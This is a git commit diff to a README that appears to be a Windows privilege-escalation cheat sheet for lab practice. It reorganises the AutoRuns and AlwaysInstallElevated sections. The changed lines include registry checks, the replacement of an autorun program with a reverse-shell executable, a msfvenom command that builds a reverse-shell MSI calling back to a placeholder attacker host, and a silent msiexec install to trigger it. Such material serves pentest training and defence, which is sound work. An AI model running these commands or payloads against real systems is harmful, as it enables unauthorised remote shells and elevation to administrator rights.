Update README.md
This commit is contained in:
@@ -1330,7 +1330,7 @@ net start dllsvc
|
|||||||
|
|
||||||
<br />
|
<br />
|
||||||
|
|
||||||
##### Always Install Elevated
|
##### AutoRuns
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
#########################################################################
|
#########################################################################
|
||||||
@@ -1351,6 +1351,7 @@ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|||||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
##### Always Install Elevated
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
@@ -1362,13 +1363,15 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
|||||||
# Winpeas Enumeration to see if both registry values are set
|
# Winpeas Enumeration to see if both registry values are set
|
||||||
.\winPEASany.exe quiet windowscreds
|
.\winPEASany.exe quiet windowscreds
|
||||||
|
|
||||||
|
# Manual Enumeration
|
||||||
|
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
|
|
||||||
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
||||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP ADDRESS} LPORT={PORT} -f msi -o reverse.msi
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
|
||||||
|
|
||||||
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
||||||
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
|
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user